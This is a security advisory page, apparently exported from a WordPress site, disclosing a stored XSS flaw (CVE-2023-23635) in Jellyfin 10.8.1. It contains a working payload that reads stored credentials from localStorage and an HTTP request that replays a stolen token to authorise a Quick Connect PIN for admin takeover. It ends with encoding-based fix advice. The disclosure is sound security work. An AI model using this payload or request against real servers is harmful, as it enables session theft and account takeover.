{"id":19359,"date":"2023-01-01T17:45:00","date_gmt":"2023-01-01T16:45:00","guid":{"rendered":"https:\/\/herolab.usd.de\/usd-20220031\/"},"modified":"2023-11-29T13:20:18","modified_gmt":"2023-11-29T12:20:18","slug":"usd-2022-0031","status":"publish","type":"page","link":"https:\/\/herolab.usd.de\/en\/security-advisories\/usd-2022-0031\/","title":{"rendered":"usd-2022-0031"},"content":{"rendered":"

[et_pb_section fb_built=\"1\" _builder_version=\"4.16\" _module_preset=\"default\" background_color=\"#2E353D\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.16\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.16\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.23.1\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"]<\/p>\n

usd-2022-0031 | Jellyfin 10.8.1 - Cross-Site Scripting<\/h1>\n

Advisory ID:<\/strong> usd-2022-0031
\nProduct:<\/strong> Jellyfin
\nAffected Version:<\/strong> 10.8.1
\nVulnerability Type:<\/strong> CWE-79
\nSecurity Risk:<\/strong> CRITICAL
\nVendor URL:<\/strong> https:\/\/jellyfin.org<\/a>
\nVendor Status:<\/strong> Fixed
\nCVE Number:<\/strong> CVE-2023-23635
\nCVE Link:<\/strong> https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2023-23635<\/a><\/p>\n

 <\/p>\n

Description<\/h2>\n

A stored XSS in Jellyfin 10.8.1 allows an remote attacker to inject JavaScript into the name of a collection to perform a Cross-Site Scripting (XSS) attack.
\nBecause session tokens are stored in the localStorage, the attacker can extract them via javascript.<\/p>\n

Proof of Concept<\/h2>\n

The following screenshot shows how an attacker can create a malicious collection.<\/p>\n

\"\"
\nThe injected JavaScript code is executed in the user's browser, if a user (e.g. admin) visits the collections<\/em> page.<\/p>\n

\"\"
\nIf you want to do some more interesting stuff with this vulnerability like taking over the admin account, you can use the following payload to read the access tokens from the localStorage.<\/p>\n

\n
<\/span>\"><img src=\/X onerror=alert(localStorage.getItem(\"jellyfin_credentials\"))>\n<\/pre>\n<\/div>\n
Getting the access token and device id allows you to rebuild the request for the Quick Connect<\/em> Feature.<\/p>\n
This feature allows users to login using a PIN. The following request sets a PIN.<\/p>\n
\n
<\/span>POST<\/span> \/QuickConnect\/Authorize?Code=111111<\/span> HTTP<\/span>\/<\/span>1.1<\/span>\nHost<\/span>:<\/span> localhost:8096<\/span>\nUser-Agent<\/span>:<\/span> Mozilla\/5.0 (X11; Linux x86_64; rv:102.0) Gecko\/20100101 Firefox\/102.0<\/span>\nAccept<\/span>:<\/span> *\/*<\/span>\nAccept-Language<\/span>:<\/span> en-US,en;q=0.5<\/span>\nAccept-Encoding<\/span>:<\/span> gzip, deflate<\/span>\nX-Emby-Authorization<\/span>:<\/span> MediaBrowser Client=\"Jellyfin Web\", Device=\"Firefox\", DeviceId=\"TW96aWxsYS81LjAgKFgxMTsgTGludXggeDg2XzY0OyBydjoxMDAuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC8xMDAuMHwxNjU2NzU0NTEwMjcz\", Version=\"10.8.1\", Token=\"7bd97aae0924484884d7d13a74e9517c\"<\/span>\nOrigin<\/span>:<\/span> [http:\/\/localhost:8096]()<\/span>\nSec-Fetch-Dest<\/span>:<\/span> empty<\/span>\nSec-Fetch-Mode<\/span>:<\/span> cors<\/span>\nSec-Fetch-Site<\/span>:<\/span> same-origin<\/span>\nConnection<\/span>:<\/span> close<\/span>\nCookie<\/span>:<\/span> sfcsrftoken=S82egH1Csl8FsxnMPQ6NGzXCWL3tiI8tNUvfsNyXnAVoGGthaUjsjrWesdhvu9Gc<\/span>\nContent-Length<\/span>:<\/span> 0<\/span><\/pre>\n<\/div>\n
Fix<\/h2>\n
It is recommended to treat all input on the website as potentially dangerous.
\nHence, all output that is dynamically generated based on user-controlled data should be encoded according to its context.
\nThe majority of programming languages support standard procedures for encoding meta characters.<\/p>\n
References<\/h2>\n